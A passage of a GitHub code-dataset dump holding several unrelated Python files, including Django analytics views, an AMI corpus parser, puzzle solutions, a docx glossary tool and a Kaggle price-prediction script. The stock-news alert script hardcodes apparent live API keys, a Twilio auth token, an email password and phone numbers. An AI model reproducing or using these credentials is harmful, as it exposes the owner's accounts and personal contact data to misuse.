window_size == 'WEEK':\n pos = pos.annotate(window_size=TruncWeek('created_datetime')).values('window_size')\\\n .annotate(count=Count('payment')).values('window_size', 'restaurant_id', 'payment', 'count')\n\n elif window_size == 'MONTH':\n pos = pos.annotate(month=\n Substr(\n Cast(TruncMonth('created_datetime', output_field=DateTimeField()),\n output_field=CharField()), 6, 2)\n ).values('month')\\\n .annotate(count=Count('payment')).values('restaurant_id', 'payment', 'count', 'month')\n \n elif window_size == 'YEAR':\n pos = pos.annotate(year=\n Substr(\n Cast(TruncYear('created_datetime', output_field=DateTimeField()),\n output_field=CharField()), 1, 4)\n ).values('year')\\\n .annotate(count=Count('payment')).values('restaurant_id', 'payment', 'count', 'year')\n\n \n serializer = RestaurantPaymentKPISerializer(pos, many=True)\n return Response(serializer.data, status=200)\n","repo_name":"PreOnboarding-Team-C/02_BearRobotics_C","sub_path":"apps/restaurants/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"72504519523","text":"#!/usr/bin/python3\n\"\"\"2. POST an email #0 \"\"\"\n\nfrom sys import argv\nimport urllib.parse\nimport urllib.request\n\nif __name__ == '__main__':\n url = argv[1]\n values = {'email': argv[2]}\n\n data = urllib.parse.urlencode(values)\n data = data.encode('ascii')\n\n req = urllib.request.Request(url, data)\n with urllib.request.urlopen(req) as response:\n print(response.read().decode('utf-8'))\n","repo_name":"Louvani/holbertonschool-higher_level_programming","sub_path":"0x11-python-network_1/2-post_email.py","file_name":"2-post_email.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"42288036043","text":"class User:\n def __init__(self, market):\n self.market = market\n self.stocks = dict()\n for each in market.companies:\n self.stocks[each] = 0\n self.money = 5000\n\n def buy(self, company, price, amount):\n print(price)\n print(amount)\n if self.money >= price*amount:\n self.market.active_offers[company].insert(1, [self, price, amount])\n\n def sell(self, company, price, amount):\n if amount <= self.stocks[company]:\n self.market.active_offers[company].insert(1, [self, price, -amount])\n","repo_name":"yankur/StockExchange_coursework","sub_path":"user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27663453049","text":"from sources.pdesolver.formula_parser.visitor import Visitor\n\n\nclass SimpleExpressionEvaluator(Visitor):\n \"\"\"\n Implements an evaluator for expressions that have been parsed with the formula_parser.\n It is implemented as a visitor that is applied on the parsed formula.\n\n Attributes\n ------\n values: keeps the set of results and intermediary results used as a stack.\n\n\n\n \"\"\"\n\n\n def __init__(self, variables, functions={}):\n \"\"\"\n :param variables: Set of variables that may be used for the evaluation\n :param functions: Set of functions that may be used for the evaluation\n \"\"\"\n self.values = []\n self.variables = variables\n self.functions = functions\n self.result = None\n\n def get_result(self):\n if self.result is None:\n self.result = self.values.pop()\n return self.result\n\n def visit_number(self, number_expr):\n self.values.append(number_expr.get_value())\n\n def visit_function_call(self, function_call_expr):\n parameter_values = []\n for parameter in function_call_expr.get_parameter_expr_list():\n parameter.accept(self)\n parameter_values.append(self.values.pop())\n\n function_name = function_call_expr.get_function_name()\n if function_name in self.functions:\n fn = self.functions[function_name]\n function_result = fn(parameter_values)\n self.values.append(function_result)\n else:\n raise Exception(\"Function not provided for evaluation:\" + function_name)\n\n def visit_variable(self, variable_expr):\n name = variable_expr.get_name()\n if name in self.variables:\n self.values.append(self.variables[name])\n else:\n raise Exception(\"Variable has no value:\"+name)\n\n def visit_child_expression(self, child_expr):\n child_expr.get_child().accept(self)\n\n def visit_binary_operator(self, binary_expr):\n symbol = binary_expr.get_symbol()\n\n binary_expr.get_left_child_expr().accept(self)\n binary_expr.get_right_child_expr().accept(self)\n\n right_value = self.values.pop()\n left_value = self.values.pop()\n\n if symbol == '+':\n self.values.append(left_value + right_value)\n elif symbol == '-':\n self.values.append(left_value - right_value)\n elif symbol == '*':\n self.values.append(left_value * right_value)\n elif symbol == '/':\n self.values.append(left_value / right_value)\n else:\n raise Exception('Unsupported operator symbol:'+symbol)\n\n def visit_unary_operator(self, unary_expr):\n symbol = unary_expr.get_symbol()\n unary_expr.get_child_expr().accept(self)\n\n child_value = self.values.pop()\n\n if symbol == '+':\n self.values.append(child_value)\n elif symbol == '-':\n self.values.append(-child_value)\n else:\n raise Exception('Unsupported operator symbol:' + symbol)\n","repo_name":"JohannOberleitner/pdesolver","sub_path":"sources/pdesolver/pde/SimpleExpressionEvaluator.py","file_name":"SimpleExpressionEvaluator.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13462590592","text":"import sys\r\nfrom collections import deque\r\ninput = sys.stdin.readline\r\n\r\nd = [(1,0),(-1,0),(0,1),(0,-1)]\r\n\r\nn,m = map(int,input().split())\r\nboard = [list(input().rstrip()) for _ in range(n)]\r\nvis = [[[0] * m for _ in range(n)] for _ in range(2)]\r\n\r\ndef bfs(x,y):\r\n vis[1][x][y] = 1\r\n q = deque()\r\n q.append((x,y,1))\r\n while q:\r\n px,py,wc = q.popleft()\r\n if px == n-1 and py == m-1:\r\n return vis[wc][px][py]\r\n for dx,dy in d:\r\n nx = px + dx\r\n ny = py + dy\r\n if 0 <= nx < n and 0 <= ny < m:\r\n if board[nx][ny] == '0' and vis[wc][nx][ny] == 0:\r\n vis[wc][nx][ny] = vis[wc][px][py] + 1\r\n q.append((nx,ny,wc))\r\n elif wc > 0 and board[nx][ny] == '1' and vis[wc-1][nx][ny] == 0:\r\n vis[wc-1][nx][ny] = vis[wc][px][py] + 1 \r\n q.append((nx,ny,wc-1))\r\n return -1 \r\n\r\nprint(bfs(0,0))\r\n","repo_name":"yootal/CodingTest","sub_path":"백준/Gold/2206. 벽 부수고 이동하기/벽 부수고 이동하기.py","file_name":"벽 부수고 이동하기.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10310943487","text":"import requests\nimport datetime as dt\nfrom twilio.rest import Client\nimport smtplib\n\nSTOCK = \"TSLA\"\nCOMPANY_NAME = \"Tesla Inc\"\nCHANGE = 0\n\nALPHA_VANTAGE_API_KEY = \"QJBEJGRF3O7UTNUK\"\nALPHA_VANTAGE_END_POINT = \"https://www.alphavantage.co/query\"\n\nNEWS_API_END_POINT = \"https://newsapi.org/v2/everything\"\nNEWSAPI_API_KEY = \"1aa76e5062a14bb3a6307d205d8ab3c5\"\n\naccount_sid = \"AC8a95a85cabd382f190b3ac17e0a97d26\"\nauth_token = \"1c531beaff38baf0e0b5b5148a225b61\"\n\nEMAIL = \"562937707@qq.com\"\nPASSWORD = \"bpyjiqjylklcbdhe\"\n\n# # STEP 1: Use https://www.alphavantage.co\n# When STOCK price increase/decreases by 5% between yesterday and the day before yesterday then print(\"Get News\").\nalpha_vantage_params = {\n \"function\": \"TIME_SERIES_DAILY\",\n \"symbol\": \"TSLA\",\n \"apikey\": ALPHA_VANTAGE_API_KEY\n}\nresponse = requests.get(ALPHA_VANTAGE_END_POINT, params=alpha_vantage_params)\nresponse.raise_for_status()\nalpha_vantage_data = response.json()[\"Time Series (Daily)\"]\nprint(alpha_vantage_data)\nalpha_vantage_data_list = [value for (key, value) in alpha_vantage_data.items()]\nyesterday = alpha_vantage_data_list[0]\nday_before_yesterday = alpha_vantage_data_list[1]\nyesterday_price = float(yesterday[\"4. close\"])\nprint(yesterday_price)\nday_before_yesterday_price = float(day_before_yesterday[\"4. close\"])\nprint(day_before_yesterday_price)\nprice_change = (yesterday_price-day_before_yesterday_price)/day_before_yesterday_price * 100\nprint(price_change)\nif price_change > 0:\n sign = \"up\"\nelse:\n sign = \"down\"\n\nprice_change = round(price_change, 2)\nif abs(price_change) > CHANGE:\n print(\"send news\")\n # # STEP 2: Use https://newsapi.org\n # Instead of printing (\"Get News\"), actually get the first 3 news pieces for the COMPANY_NAME.\n\n newsapi_params = {\n \"apiKey\": NEWSAPI_API_KEY,\n \"qInTitle\": COMPANY_NAME,\n }\n response = requests.get(NEWS_API_END_POINT, params=newsapi_params)\n response.raise_for_status()\n news = response.json()\n\n articles = response.json()\n three_articles = articles[\"articles\"][:3]\n formatted_articles = f\"TSLA: {sign}{price_change}%\\n\"\n for article in three_articles:\n formatted_articles += f\"Headline: {article['title']}\\n\"\n formatted_articles += f\"Brief: {article['description']}\\n\"\n print(formatted_articles)\n # # STEP 3: Use https://www.twilio.com\n # Send a separate message with the percentage change and each article's title and description to your phone number.\n client = Client(account_sid, auth_token)\n message = client.messages \\\n .create(\n body=f\"{formatted_articles}\",\n from_='+16065540848',\n to='+8619808145773'\n )\n print(message.status)\n\n with smtplib.SMTP(\"smtp.qq.com\") as connection:\n connection.starttls()\n connection.login(user=EMAIL, password=PASSWORD)\n connection.sendmail(from_addr=EMAIL,\n to_addrs=EMAIL,\n msg=f\"Subject:STOCK NEWS\\n\\n{formatted_articles}\")\nelse:\n print(\"change is too small.\")\n\n\n# Optional: Format the SMS message like this:\n\"\"\"\nTSLA: 🔺2%\nHeadline: Were Hedge Funds Right About Piling Into Tesla Inc. (TSLA)?. \nBrief: We at Insider Monkey have gone over 821 13F filings that hedge funds and prominent investors are required to file by the SEC The 13F filings show the funds' and investors' portfolio positions as of March 31st, near the height of the coronavirus market crash.\nor\n\"TSLA: 🔻5%\nHeadline: Were Hedge Funds Right About Piling Into Tesla Inc. (TSLA)?. \nBrief: We at Insider Monkey have gone over 821 13F filings that hedge funds and prominent investors are required to file by the SEC The 13F filings show the funds' and investors' portfolio positions as of March 31st, near the height of the coronavirus market crash.\n\"\"\"\n\n","repo_name":"yufanme/stock-news-extrahard-start36","sub_path":"stock-news-extrahard-start/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43524405837","text":"#!/usr/bin/env python\n# coding: utf-8\nimport argparse\nimport codecs\nimport os\nimport xml.etree.ElementTree as et\nimport re\nimport sys\n\nfrom json_core import Sent, Topic, to_json\n\n\nNAMESPACE_NITE = 'http://nite.sourceforge.net/'\nOTHER_DESCRIPTION = 'other_description'\nNITE_ID_ATTR = '{' + NAMESPACE_NITE + '}id'\nNAME_ATTR = 'name'\nTOPICNAME_TAG = 'topicname'\nNITE_POINTER_TAG = '{' + NAMESPACE_NITE + '}pointer'\nNITE_CHILD_TAG = '{' + NAMESPACE_NITE + '}child'\nTOPIC_TAG = 'topic'\nHREF_ATTR = 'href'\nW_TAG = 'w'\nSTART_TIME_ATTR = 'starttime'\nEND_TIME_ATTR = 'endtime'\nTRUNC_ATTR = 'trunc'\nPUNC_ATTR = 'punc'\n\n\ndef get_default_topics(root):\n default_topics = {}\n # recursively\n for topicname_element in root.iter(TOPICNAME_TAG):\n id_ = topicname_element.get(NITE_ID_ATTR)\n default_topics[id_] = topicname_element.get(NAME_ATTR)\n return default_topics\n\n\ndef get_speaker_words(root):\n nite_id_attr = root.get(NITE_ID_ATTR)\n speaker = re.search(r'\\.(.+)\\.', nite_id_attr).group(1)\n words = [e for e in root]\n return speaker, words\n\n\ndef topics_lines(topics_root, default_topics, speaker_segment_dict, speaker_word_dict):\n topics = []\n sents = []\n speaker_segment_pos_dict = {}\n for speaker in speaker_segment_dict:\n speaker_segment_pos_dict[speaker] = 0\n for topic_element in topics_root:\n topic = parse_ami_topic(topic_element, default_topics,\n speaker_segment_dict,\n speaker_segment_pos_dict,\n speaker_word_dict, sents)\n topics.append(topic)\n return topics, sents\n\n\ndef is_valid_word_element(e):\n return e.tag == W_TAG and TRUNC_ATTR not in e.attrib\n\n\ndef get_valid_word_elements(e_list):\n return filter(is_valid_word_element, e_list)\n\n\ndef words_to_sent(speaker, words):\n if not words:\n return None\n text = ' '.join(map(lambda x: x.text, words))\n if not text:\n return None\n start_time = words[0].get(START_TIME_ATTR)\n end_time = words[-1].get(END_TIME_ATTR)\n return Sent(start_time, end_time, speaker, text)\n\n\ndef get_speaker_segments(root):\n nite_id_attr = root.get(NITE_ID_ATTR)\n speaker = re.search(r'\\.(.+)\\.', nite_id_attr).group(1)\n segments = []\n for segment_element in root:\n child_element = segment_element.find(NITE_CHILD_TAG)\n href_attr = child_element.get(HREF_ATTR)\n _, range_ = href_attr.split('#')\n groups = re.findall(r'words(\\d+)', range_)\n if len(groups) == 1:\n start = int(groups[0])\n end = start\n else:\n start, end = map(int, groups)\n segments.append((start, end))\n return speaker, segments\n\n\ndef parse_ami_topic(topic_element, default_topics, speaker_segment_dict,\n speaker_segment_pos_dict, speaker_word_dict, sents):\n subtopics = []\n description = ''\n topic_start = len(sents)\n next_line_num = topic_start\n if OTHER_DESCRIPTION in topic_element.attrib:\n description = topic_element.get(OTHER_DESCRIPTION)\n\n for element in topic_element:\n if element.tag == TOPIC_TAG:\n subtopic = parse_ami_topic(element, default_topics,\n speaker_segment_dict,\n speaker_segment_pos_dict,\n speaker_word_dict, sents)\n subtopics.append(subtopic)\n elif element.tag == NITE_POINTER_TAG and not description:\n href_attr = element.get(HREF_ATTR)\n topic_id = href_attr[href_attr.rfind('top'):-1]\n description = default_topics[topic_id]\n elif element.tag == NITE_CHILD_TAG:\n href_attr = element.get(HREF_ATTR)\n filename, range_ = href_attr.split('#')\n speaker = re.search(r'\\.(\\w)\\.', filename).group(1)\n groups = re.findall(r'words(\\d+)', range_)\n if len(groups) == 1:\n child_start = int(groups[0])\n child_end = child_start\n else:\n child_start, child_end = map(int, groups)\n segments = speaker_segment_dict[speaker]\n segment_pos = speaker_segment_pos_dict[speaker]\n words = speaker_word_dict[speaker]\n start = child_start\n for pos in xrange(segment_pos, len(segments)):\n segment_start, segment_end = segments[pos]\n end = segment_end if segment_end <= child_end else child_end\n sent = words_to_sent(speaker, get_valid_word_elements(words[start:end + 1]))\n start = end + 1\n if sent:\n sents.append(sent)\n next_line_num += 1\n if segment_end >= child_end:\n if segment_end == child_end:\n segment_pos = pos + 1\n break\n speaker_segment_pos_dict[speaker] = segment_pos\n topic_end = len(sents) - 1\n return Topic(topic_start, topic_end, description, subtopics)\n\n\ndef parse_word(word_xmls):\n speaker_word_dict = {}\n for word_xml in word_xmls:\n root = et.parse(word_xml).getroot()\n speaker, words = get_speaker_words(root)\n speaker_word_dict[speaker] = words\n return speaker_word_dict\n\n\ndef parse_segment(segment_xmls):\n speaker_segment_dict = {}\n for segment_xml in segment_xmls:\n root = et.parse(segment_xml).getroot()\n speaker, segments = get_speaker_segments(root)\n speaker_segment_dict[speaker] = segments\n return speaker_segment_dict\n\n\ndef ami_to_json(meeting_id, topic_xml, word_xmls, segment_xmls, default_topics_xml, out_file):\n speaker_word_dict = parse_word(word_xmls)\n speaker_segment_dict = parse_segment(segment_xmls)\n default_topics_root = et.parse(default_topics_xml).getroot()\n default_topics = get_default_topics(default_topics_root)\n topic_root = et.parse(topic_xml).getroot()\n topics, sents = topics_lines(topic_root, default_topics, speaker_segment_dict, speaker_word_dict)\n to_json(meeting_id, sents, topics, out_file)\n\n\nif __name__ == '__main__':\n arg_parser = argparse.ArgumentParser()\n arg_parser.add_argument('topic_dir')\n arg_parser.add_argument('word_dir')\n arg_parser.add_argument('segment_dir')\n arg_parser.add_argument('default_topics_xml')\n arg_parser.add_argument('output_dir')\n args = arg_parser.parse_args()\n\n topic_xmls = map(lambda x: os.path.join(args.topic_dir, x),\n os.listdir(args.topic_dir))\n all_word_xmls = map(lambda x: os.path.join(args.word_dir, x),\n os.listdir(args.word_dir))\n all_segment_xmls = map(lambda x: os.path.join(args.segment_dir, x),\n os.listdir(args.segment_dir))\n if not os.path.exists(args.output_dir):\n os.mkdir(args.output_dir)\n for topic_xml in topic_xmls:\n meeting_id = re.search(r'^([\\w\\d]+)',\n os.path.split(topic_xml)[1]).group(1)\n word_xmls = filter(lambda x: meeting_id in x, all_word_xmls)\n segment_xmls = filter(lambda x: meeting_id in x, all_segment_xmls)\n output_path = os.path.join(args.output_dir,\n '{}.json'.format(meeting_id))\n with codecs.open(output_path, mode='w', encoding='utf-8') as output:\n ami_to_json(meeting_id, topic_xml, word_xmls, segment_xmls, args.default_topics_xml, output)\n sys.exit(0)\n","repo_name":"binghaobhw/topic-segmentation","sub_path":"topic-segmentation/ami_to_json.py","file_name":"ami_to_json.py","file_ext":"py","file_size_in_byte":7483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22929262741","text":"class Solution(object):\n def orangesRotting(self, grid):\n \"\"\"\n :type grid: List[List[int]]\n :rtype: int\n \"\"\"\n\n from collections import deque\n\n fresh = 0\n q = deque()\n M = len(grid)\n N = len(grid[0])\n\n for i in range(M):\n for j in range(N):\n if grid[i][j] == 2:\n q.append((i, j, 0))\n if grid[i][j] == 1:\n fresh += 1\n\n minute = 0\n prev = fresh\n while q:\n i,j,minute = q.popleft()\n if grid[i][j] == 2:\n for r,c in [(i-1,j), (i+1,j), (i,j-1), (i,j+1)]:\n if 0<=r<M and 0<=c<N and grid[r][c] == 1:\n grid[r][c] = 2\n fresh -= 1\n q.append((r,c,minute+1))\n\n if fresh > 0:\n return -1\n else:\n return minute\n\n\nsol = Solution()\nprint(sol.orangesRotting([[2,1,1],[1,1,0],[0,1,1]]))","repo_name":"noah0504789/F-lab-Algorithm","sub_path":"leetcode/python/leetcode/994. Rotting Oranges.py","file_name":"994. Rotting Oranges.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10149516589","text":"import docx\r\nimport pathlib\r\n# Глоссарий общий и спеки, лучше хранить в рахных папках\r\n\r\nc = pathlib.Path(r'') #полный путь до папки со спеками\r\nall_files = []\r\nfor i in c.iterdir():\r\n all_files.append(i)\r\n\r\n\r\n\r\nterms = dict()\r\nterms_doc = docx.Document(r'') #полный путь до глоссария\r\nttt = terms_doc.tables[0]\r\nfor row in ttt.rows:\r\n terms[row.cells[0].text] = row.cells[1].text\r\n\r\n\r\n\r\n\r\n\r\nfor files in all_files:\r\n doc = docx.Document(files)\r\n tables = doc.tables\r\n count = 0\r\n textt = []\r\n for paragraph in doc.paragraphs:\r\n textt.append(paragraph.text)\r\n\r\n\r\n\r\n\r\n # создаем пустой словарь под данные таблиц\r\n data_tables = {i:None for i in range(len(tables))}\r\n # проходимся по таблицам\r\n for i, table in enumerate(tables):\r\n # создаем список строк для таблицы `i` (пока пустые)\r\n data_tables[i] = [[] for _ in range(len(table.rows))]\r\n # проходимся по строкам таблицы `i`\r\n for j, row in enumerate(table.rows):\r\n # проходимся по ячейкам таблицы `i` и строки `j`\r\n for cell in row.cells:\r\n # добавляем значение ячейки в соответствующий\r\n # список, созданного словаря под данные таблиц\r\n data_tables[i][j].append(cell.text)\r\n\r\n\r\n q = [i for i in data_tables.values()]\r\n for i in q:\r\n for j in i:\r\n for jj in j:\r\n textt.append(jj)\r\n\r\n\r\n buff = []\r\n for i in textt:\r\n if i in terms.keys() and i not in buff:\r\n if i == 'Комментарий' or i == 'Термин':\r\n continue\r\n else:\r\n buff.append(i)\r\n\r\n for paragraph in doc.paragraphs:\r\n count += 1\r\n if count == 8:\r\n t = doc.add_table(len(buff),2)\r\n t.style = 'Table Grid'\r\n for row in range(len(buff)):\r\n for col in range(2):\r\n cell = t.cell(row, col)\r\n if col == 0:\r\n cell.text = buff[row]\r\n else:\r\n cell.text = terms[buff[row]]\r\n elif count > 8:\r\n break\r\n\r\n doc.save(str(files).split('\\\\')[-1].split('.')[0]+'_TEST_'+'.docx')\r\n\r\n\r\n","repo_name":"Nubikk/Parser_Glossary","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2481316575","text":"IS_LOCAL = False\nIS_KAGGLE_SERVER = not IS_LOCAL\nif IS_KAGGLE_SERVER:\n import os\n os.environ['NUMEXPR_NUM_THREADS'] = '4'\n os.environ['OPENBLAS_NUM_THREADS'] = '4'\n os.environ['MKL_NUM_THREADS'] = '4'\n import mkl\n mkl.set_num_threads(4)\n\nimport enum\nimport gc\nimport time\nfrom typing import List\n\nimport lightgbm as lgb\nimport numpy as np\nimport pandas as pd\nimport scipy as scipy\nimport scipy.sparse as sp\nfrom joblib import Parallel, delayed\nfrom keras.callbacks import LearningRateScheduler\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.linear_model import Ridge\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import KFold\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder, StandardScaler\n\n\nclass Timer:\n def __init__(self, timer_name):\n self.timer_name = timer_name\n self.start_time = self.last_time = time.time()\n\n def get_total_and_since_last(self):\n current_time = time.time()\n total = current_time - self.start_time\n since_last = current_time - self.last_time\n self.last_time = current_time\n return total, since_last\n\n def print(self, message):\n total, since_last = self.get_total_and_since_last()\n print('### [{}] [{:6.1f}] [{:6.1f}] {}'.format(self.timer_name, total, since_last, message))\n\n\ndef rmse(y, correct_y):\n return np.sqrt(mean_squared_error(y, correct_y))\n\n\ndef split_category_name(category_name: str):\n spl = category_name.split('/', 2)\n if len(spl) == 3:\n return spl\n else:\n return ['', '', '']\n\n\ndef read_dataset(down_sampling_rate=None, train_size=None):\n train = pd.read_table('../input/train.tsv', engine='c')\n test = pd.read_table('../input/test.tsv', engine='c')\n if down_sampling_rate is not None:\n assert 0 < down_sampling_rate < 1.0\n train = train.sample(frac=down_sampling_rate, random_state=1919)\n test = test.sample(frac=down_sampling_rate, random_state=810)\n\n train['labeled'] = True\n train['log1p_price'] = np.log1p(train['price'])\n\n train['for_train'] = True\n if train_size is not None:\n assert 0 < train_size < 1.0\n train = train.sample(frac=1, random_state=364364).reset_index(drop=True)\n train.loc[int(train.shape[0] * train_size):, 'for_train'] = False\n\n test['labeled'] = False\n test['for_train'] = False\n train.rename(columns={'train_id': 'id'}, inplace=True)\n test.rename(columns={'test_id': 'id'}, inplace=True)\n\n dataset = pd.concat([train, test], ignore_index=True)\n\n clean_dirty_data(dataset)\n\n # extend\n dataset['name'] = dataset['brand_name'] + ' ' + dataset['name']\n dataset['item_description'] = dataset['name'] + ' ' + \\\n dataset['item_description']\n\n # preprocessor = Preprocessor().fit(dataset['name'].tolist() + dataset['item_description'].tolist())\n # dataset['name'] = dataset['name'].map(preprocessor.preprocess_symbols)\n # dataset['item_description'] = dataset['item_description'].map(preprocessor.preprocess_symbols)\n\n add_sub_cagegories(dataset)\n\n return dataset\n\n\ndef clean_dirty_data(dataset):\n dataset['name'].fillna('', inplace=True)\n dataset['category_name'].fillna('', inplace=True)\n dataset['brand_name'].fillna('', inplace=True)\n dataset['item_description'].fillna('', inplace=True)\n\n dataset.drop(dataset[dataset.price < 1.0].index, inplace=True)\n dataset.reset_index(inplace=True, drop=True)\n\n\ndef add_sub_cagegories(dataset):\n spl = dataset['category_name'].apply(split_category_name)\n dataset['category1'], dataset['category2'], dataset['category3'] = zip(*spl)\n\n\ndef create_sub_categories(dataset: pd.DataFrame):\n spl = dataset['category_name'].apply(split_category_name)\n\n df = pd.DataFrame()\n df['category1'], df['category2'], df['category3'] = zip(*spl)\n\n df['category1'] = df['category1'] + '_' + dataset['item_condition_id'].astype(str)\n df['category2'] = df['category2'] + '_' + dataset['item_condition_id'].astype(str)\n df['category3'] = df['category3'] + '_' + dataset['item_condition_id'].astype(str)\n\n feature_names = ['category1', 'category2', 'category3']\n\n n = dataset.shape[0]\n feature = np.concatenate([\n LabelEncoder().fit_transform(df['category1']).reshape(n, 1),\n LabelEncoder().fit_transform(df['category2']).reshape(n, 1),\n LabelEncoder().fit_transform(df['category3']).reshape(n, 1),\n ], axis=1)\n\n assert feature.shape[0] == n\n assert feature.shape[1] == 3\n return Feature(feature_names, feature, FeatureType.CATEGORICAL)\n\n\ndef descritize_each_column(a, num_bins):\n a = a.copy()\n for col in range(a.shape[1]):\n column = a[:, col]\n _, bins = pd.qcut(np.unique(column), num_bins - 1, duplicates='drop', labels=False, retbins=True)\n\n descritized_vals = np.digitize(column, bins)\n descritized_vals = LabelEncoder().fit_transform(descritized_vals)\n\n a[:, col] = descritized_vals\n return a\n\n\nclass FeatureType(enum.Enum):\n NORMAL = enum.auto()\n CATEGORICAL = enum.auto()\n\n\nclass Feature:\n def __init__(self, feature_names, feature, feature_type=FeatureType.NORMAL, bins=None):\n if isinstance(feature_names, str):\n feature_names = [feature_names]\n # assert feature.shape[1] == len(feature_names)\n self.feature_names = feature_names\n self.feature = feature\n self.feature_type = feature_type\n self.bins = bins\n\n def get_lgb_feature_names(self):\n return self.feature_names\n\n def get_lgb_features(self):\n return self.feature\n\n def get_one_hot_like_features(self):\n if self.feature_type == FeatureType.CATEGORICAL:\n assert self.bins is None\n return OneHotEncoder().fit_transform(self.feature)\n elif self.bins is not None:\n # try-catch?\n return OneHotEncoder().fit_transform(descritize_each_column(self.feature, self.bins))\n else:\n return self.feature\n\n def get_keras_features(self):\n return self.feature\n\n def get_feature_type(self):\n return self.feature_type\n\n\ndef create_categorical_name_feature(dataset):\n name_df = pd.DataFrame()\n name_df['name'] = dataset['name'].str.lower()\n count_name = name_df['name'].value_counts()\n name_df['count'] = name_df['name'].map(count_name)\n name_df.loc[(name_df['count'] < 2), 'name'] = ''\n\n name_feature = LabelEncoder().fit_transform(name_df['name']).reshape(-1, 1)\n\n assert name_feature.shape[0] == dataset.shape[0]\n return Feature('name', name_feature, FeatureType.CATEGORICAL)\n\n\ndef create_features(dataset):\n timer = Timer('feature_creation')\n n = dataset.shape[0]\n features = []\n\n features.append(Feature('item_condition_id', dataset['item_condition_id'].values.reshape(n, 1), FeatureType.CATEGORICAL))\n features.append(Feature('shipping', dataset['shipping'].values.reshape(n, 1), FeatureType.CATEGORICAL))\n features.append(Feature('brand_name', LabelEncoder().fit_transform(dataset['brand_name']).reshape(n, 1), FeatureType.CATEGORICAL))\n features.append(Feature('category_name', LabelEncoder().fit_transform(dataset['category_name']).reshape(n, 1), FeatureType.CATEGORICAL))\n features.append(create_sub_categories(dataset))\n features.append(create_categorical_name_feature(dataset))\n\n features.append(Feature('name_len', dataset['name'].str.len().values.reshape(n, 1), bins=10))\n features.append(Feature('item_description_len', dataset['item_description'].str.len().values.reshape(n, 1), bins=40))\n\n features.append(Feature('name_count_words', dataset['name'].str.count(' ').values.reshape(n, 1) + 1, feature_type=FeatureType.CATEGORICAL))\n features.append(Feature('item_description_count_words', dataset['item_description'].str.count(' ').values.reshape(n, 1) + 1, bins=20))\n timer.print('Done basic')\n\n return features\n\n\ndef create_sparse_features(dataset, feature_params):\n timer = Timer('sparse feature')\n timer.print('Start')\n\n sparse_features = []\n sparse_features.append(create_doc_term_of_name(dataset, **feature_params['name_term']))\n timer.print('Done create_doc_term_of_name')\n\n sparse_features.append(create_doc_term_of_description(dataset, **feature_params['desc_term']))\n timer.print('Done create_doc_term_of_description')\n\n return sparse_features\n\n\ndef predict(models, features):\n predicts = np.ndarray(shape=(features.shape[0], len(models)), dtype=np.float64)\n for i, model in enumerate(models):\n predicts[:, i] = model.predict(features)\n return predicts.mean(axis=1)\n\n\n# one hot\ndef create_one_hot_like_features(features: List[Feature], start, end, train_size, verbose=False):\n one_hot_like_features = []\n for feature in features:\n gc.collect()\n one_hot_like_feature = feature.get_one_hot_like_features()\n one_hot_like_features.append(one_hot_like_feature)\n if verbose:\n print('{:20s}, {}'.format(feature.get_lgb_feature_names()[0], one_hot_like_feature.shape))\n gc.collect()\n f = scipy.sparse.hstack(one_hot_like_features, dtype=np.float64).tocsr()\n f = drop_non_intersect_features(f, train_size)\n # assert np.unique(f.data) == [1]\n f = f[start:end]\n gc.collect()\n return f\n\n\ndef preprocess(a):\n return a.lower().replace('$', ' dolloars ').replace('gb', ' gb ').replace('+', ' plus ')\n\n\ndef drop_non_intersect_features(matrix, train_size):\n intersect = (matrix[:train_size].sum(axis=0) > 0).A1 & (matrix[train_size:].sum(axis=0) > 0).A1\n return matrix[:, intersect]\n\n\ndef create_doc_term_of_name(dataset, min_df, ngram_range):\n name = dataset['name'].map(preprocess)\n\n vec = CountVectorizer(\n min_df=min_df,\n ngram_range=ngram_range,\n token_pattern=r\"(?u)\\b\\w+\\b\",\n stop_words='english',\n binary=True\n )\n print(vec)\n count_matrix = vec.fit_transform(name[dataset['for_train']])\n count_matrix = sp.vstack([count_matrix, vec.transform(name[~dataset['for_train']])])\n\n print(count_matrix.shape)\n count_matrix = drop_non_intersect_features(count_matrix, dataset['for_train'].sum())\n print(count_matrix.shape)\n\n # assert np.unique(count_matrix.data) == [1]\n return Feature('doc_term_of_name', count_matrix)\n\n\ndef create_doc_term_of_description(dataset, min_df, ngram_range):\n item_description = dataset['item_description'].map(preprocess)\n\n vec = CountVectorizer(\n min_df=min_df,\n ngram_range=ngram_range,\n token_pattern=r\"(?u)\\b\\w+\\b\",\n stop_words='english',\n binary=True\n )\n print(vec)\n count_matrix = vec.fit_transform(item_description[dataset['for_train']])\n count_matrix = sp.vstack([count_matrix, vec.transform(item_description[~dataset['for_train']])])\n\n print(count_matrix.shape)\n count_matrix = drop_non_intersect_features(count_matrix, dataset['for_train'].sum())\n print(count_matrix.shape)\n\n # assert np.unique(count_matrix.data) == [1]\n return Feature('doc_term_of_description', count_matrix)\n\n\ndef calculate_each_row_mean(a):\n row_sum = np.asarray(a.sum(axis=1)).reshape(-1)\n row_nonzeros = a.getnnz(axis=1)\n row_mean = np.divide(row_sum, 